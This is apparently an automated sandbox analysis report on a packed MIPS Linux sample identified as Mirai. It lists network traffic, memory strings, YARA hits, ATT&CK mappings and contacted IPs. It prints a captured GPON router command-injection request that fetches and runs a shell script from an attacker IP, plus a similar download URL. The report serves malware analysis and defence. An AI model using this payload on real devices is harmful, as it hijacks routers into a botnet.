Source: unknown	Network traffic detected: HTTP traffic on port 34352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52234
Source: unknown	Network traffic detected: HTTP traffic on port 42470 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52232
Source: unknown	Network traffic detected: HTTP traffic on port 44032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51146
Source: unknown	Network traffic detected: HTTP traffic on port 53552 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37070
Source: unknown	Network traffic detected: HTTP traffic on port 35154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57938
Source: unknown	Network traffic detected: HTTP traffic on port 46386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54662
Source: unknown	Network traffic detected: HTTP traffic on port 33832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41568
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43740
Source: unknown	Network traffic detected: HTTP traffic on port 52856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36664 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49284
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56852
Source: unknown	Network traffic detected: HTTP traffic on port 46192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43738
Source: unknown	Network traffic detected: HTTP traffic on port 42482 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38384
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37298
Source: unknown	Network traffic detected: HTTP traffic on port 46042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39238
Source: unknown	Network traffic detected: HTTP traffic on port 50996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41548
Source: unknown	Network traffic detected: HTTP traffic on port 34116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41544
Source: unknown	Network traffic detected: HTTP traffic on port 34676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42470
Source: unknown	Network traffic detected: HTTP traffic on port 54578 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33516
Source: unknown	Network traffic detected: HTTP traffic on port 47770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46828
Source: unknown	Network traffic detected: HTTP traffic on port 39550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40040
Source: unknown	Network traffic detected: HTTP traffic on port 50952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54622
Source: unknown	Network traffic detected: HTTP traffic on port 44492 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59088
Source: unknown	Network traffic detected: HTTP traffic on port 39584 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43780
Source: unknown	Network traffic detected: HTTP traffic on port 33900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34826
Source: unknown	Network traffic detected: HTTP traffic on port 58768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44624
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38180
Source: unknown	Network traffic detected: HTTP traffic on port 35966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36640 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53552
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54646
Source: unknown	Network traffic detected: HTTP traffic on port 51154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52472
Source: unknown	Network traffic detected: HTTP traffic on port 51578 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42434
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45940
Source: unknown	Network traffic detected: HTTP traffic on port 52858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41184
Source: unknown	Network traffic detected: HTTP traffic on port 51522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55426 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55564 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34642
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55110
Source: unknown	Network traffic detected: HTTP traffic on port 56110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47714
Source: unknown	Network traffic detected: HTTP traffic on port 42742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46622
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44684
Source: unknown	Network traffic detected: HTTP traffic on port 34262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56444
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54274
Source: unknown	Network traffic detected: HTTP traffic on port 54100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47700
Source: unknown	Network traffic detected: HTTP traffic on port 60470 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57552
Source: unknown	Network traffic detected: HTTP traffic on port 53984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54044
Source: unknown	Network traffic detected: HTTP traffic on port 55844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42482
Source: unknown	Network traffic detected: HTTP traffic on port 32790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45508
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44658
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44492
Source: unknown	Network traffic detected: HTTP traffic on port 34148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58810
Source: unknown	Network traffic detected: HTTP traffic on port 44074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33360
Source: unknown	Network traffic detected: HTTP traffic on port 54122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45572
Source: unknown	Network traffic detected: HTTP traffic on port 44508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53458 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36620
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34676
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33352
Source: unknown	Network traffic detected: HTTP traffic on port 51530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45566
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46656
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43388
Source: unknown	Network traffic detected: HTTP traffic on port 35940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38438 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43386
Source: unknown	Network traffic detected: HTTP traffic on port 37554 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55564
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57742
Source: unknown	Network traffic detected: HTTP traffic on port 55260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38576 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56656
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34674
Source: unknown	Network traffic detected: HTTP traffic on port 43064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37934
Source: unknown	Network traffic detected: HTTP traffic on port 60050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45318
Source: unknown	Network traffic detected: HTTP traffic on port 40066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44460
Source: unknown	Network traffic detected: HTTP traffic on port 34126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58846
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35984
Source: unknown	Network traffic detected: HTTP traffic on port 36708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48818
Source: unknown	Network traffic detected: HTTP traffic on port 60342 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 36280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57254
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57494
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58580
Source: unknown	Network traffic detected: HTTP traffic on port 38506 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56160
Source: unknown	Network traffic detected: HTTP traffic on port 51674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60664
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38712
Source: unknown	Network traffic detected: HTTP traffic on port 34660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36486 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59200
Source: unknown	Network traffic detected: HTTP traffic on port 55086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43064
Source: unknown	Network traffic detected: HTTP traffic on port 54884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45002
Source: unknown	Network traffic detected: HTTP traffic on port 48652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45240
Source: unknown	Network traffic detected: HTTP traffic on port 38448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36772

Source: unknown	TCP traffic detected without corresponding DNS query: 181.178.147.0
Source: unknown	TCP traffic detected without corresponding DNS query: 181.205.125.52
Source: unknown	TCP traffic detected without corresponding DNS query: 181.156.172.2
Source: unknown	TCP traffic detected without corresponding DNS query: 181.255.190.113
Source: unknown	TCP traffic detected without corresponding DNS query: 181.163.174.61
Source: unknown	TCP traffic detected without corresponding DNS query: 181.254.168.183
Source: unknown	TCP traffic detected without corresponding DNS query: 181.148.173.172
Source: unknown	TCP traffic detected without corresponding DNS query: 181.89.223.188
Source: unknown	TCP traffic detected without corresponding DNS query: 181.141.144.41
Source: unknown	TCP traffic detected without corresponding DNS query: 181.96.172.0
Source: unknown	TCP traffic detected without corresponding DNS query: 181.251.58.0
Source: unknown	TCP traffic detected without corresponding DNS query: 181.33.125.171
Source: unknown	TCP traffic detected without corresponding DNS query: 181.143.111.171
Source: unknown	TCP traffic detected without corresponding DNS query: 181.197.45.65
Source: unknown	TCP traffic detected without corresponding DNS query: 181.236.212.125
Source: unknown	TCP traffic detected without corresponding DNS query: 181.25.57.187
Source: unknown	TCP traffic detected without corresponding DNS query: 181.103.196.92
Source: unknown	TCP traffic detected without corresponding DNS query: 181.21.133.4
Source: unknown	TCP traffic detected without corresponding DNS query: 181.148.130.152
Source: unknown	TCP traffic detected without corresponding DNS query: 181.22.19.236
Source: unknown	TCP traffic detected without corresponding DNS query: 181.12.15.136
Source: unknown	TCP traffic detected without corresponding DNS query: 181.161.43.147
Source: unknown	TCP traffic detected without corresponding DNS query: 181.53.140.87
Source: unknown	TCP traffic detected without corresponding DNS query: 181.66.29.144
Source: unknown	TCP traffic detected without corresponding DNS query: 181.189.178.42
Source: unknown	TCP traffic detected without corresponding DNS query: 181.143.238.153
Source: unknown	TCP traffic detected without corresponding DNS query: 181.92.243.77
Source: unknown	TCP traffic detected without corresponding DNS query: 181.183.30.87
Source: unknown	TCP traffic detected without corresponding DNS query: 181.160.164.243
Source: unknown	TCP traffic detected without corresponding DNS query: 181.168.28.199
Source: unknown	TCP traffic detected without corresponding DNS query: 181.192.243.15
Source: unknown	TCP traffic detected without corresponding DNS query: 181.130.29.138
Source: unknown	TCP traffic detected without corresponding DNS query: 181.191.149.250
Source: unknown	TCP traffic detected without corresponding DNS query: 181.0.115.52
Source: unknown	TCP traffic detected without corresponding DNS query: 181.90.100.173
Source: unknown	TCP traffic detected without corresponding DNS query: 181.148.91.131
Source: unknown	TCP traffic detected without corresponding DNS query: 181.160.143.15
Source: unknown	TCP traffic detected without corresponding DNS query: 181.62.48.89
Source: unknown	TCP traffic detected without corresponding DNS query: 181.80.169.52
Source: unknown	TCP traffic detected without corresponding DNS query: 181.218.203.87
Source: unknown	TCP traffic detected without corresponding DNS query: 181.116.22.207
Source: unknown	TCP traffic detected without corresponding DNS query: 181.248.47.247
Source: unknown	TCP traffic detected without corresponding DNS query: 181.80.198.14
Source: unknown	TCP traffic detected without corresponding DNS query: 181.182.59.161
Source: unknown	TCP traffic detected without corresponding DNS query: 181.71.186.183
Source: unknown	TCP traffic detected without corresponding DNS query: 181.30.59.60
Source: unknown	TCP traffic detected without corresponding DNS query: 181.49.84.234
Source: unknown	TCP traffic detected without corresponding DNS query: 181.32.146.106
Source: unknown	TCP traffic detected without corresponding DNS query: 181.209.246.30
Source: unknown	TCP traffic detected without corresponding DNS query: 181.36.226.174

Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp	String found in binary or memory: http://104.244.72.185/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=10392301
Source: HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp	String found in binary or memory: http://104.244.72.185/bins/Rakitin.sh
Source: HCyigyiCAH	String found in binary or memory: http://upx.sf.net

Source: unknown

HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 34 2e 32 34 34 2e 37 32 2e 31 38 35 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.72.185/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

Source: LOAD without section mappings

Program segment: 0x100000

Source: HCyigyiCAH, type: SAMPLE

Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4

Source: classification engine

Classification label: mal72.troj.evad.lin@0/0@0/0

Source: HCyigyiCAH

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Data Obfuscation:

Sample is packed with UPX

Show sources

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48002
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48030
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48034
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 47980
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48066
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48068
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48070
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48046
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48074
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48078
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48082
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48080
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48090
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48092
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48098
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48100
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48088
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48120
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 48152
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45110
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45112
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45132
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45140
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45160
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45168
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45170
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45174
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45194
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 45210

Source: /tmp/HCyigyiCAH (PID: 5287)

Queries kernel information via 'uname':

Source: HCyigyiCAH, 5287.1.000000009f971e6a.0000000014ba5497.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips/tmp/HCyigyiCAHSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/HCyigyiCAH
Source: HCyigyiCAH, 5287.1.0000000096cd3abf.00000000313fed4c.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: HCyigyiCAH, 5287.1.000000009f971e6a.0000000014ba5497.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: HCyigyiCAH, 5287.1.0000000096cd3abf.00000000313fed4c.rw-.sdmp	Binary or memory string: V!/etc/qemu-binfmt/mips

Stealing of Sensitive Information:

Yara detected Mirai

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Obfuscated Files or Information1	OS Credential Dumping	Security Software Discovery11	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
HCyigyiCAH	20%	Virustotal		Browse
HCyigyiCAH	25%	ReversingLabs	Linux.Trojan.Mirai

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://104.244.72.185/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=10392301	0%	Avira URL Cloud	safe
http://104.244.72.185/bins/Rakitin.sh	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	HCyigyiCAH	false		high
http://104.244.72.185/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=10392301	HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp	false	Avira URL Cloud: safe	unknown
http://104.244.72.185/bins/Rakitin.sh	HCyigyiCAH, 5287.1.00000000750bc847.00000000b3b30f16.r-x.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
181.46.204.107	unknown	Argentina	27747	TelecentroSAAR	false
62.138.220.15	unknown	Germany	61157	PLUSSERVER-ASN1DE	false
37.151.211.126	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
101.40.10.176	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false
109.175.65.215	unknown	Bosnia and Herzegowina	9146	BIHNETBIHNETAutonomusSystemBA	false
181.61.167.21	unknown	Colombia	10620	TelmexColombiaSACO	false
118.228.182.130	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
178.157.234.63	unknown	Denmark	43557	ASEMNETDK	false
178.30.53.85	unknown	Sweden	2119	TELENOR-NEXTELTelenorNorgeASNO	false
181.92.104.192	unknown	Argentina	7303	TelecomArgentinaSAAR	false
178.240.16.188	unknown	Turkey	16135	TURKCELL-ASTurkcellASTR	false
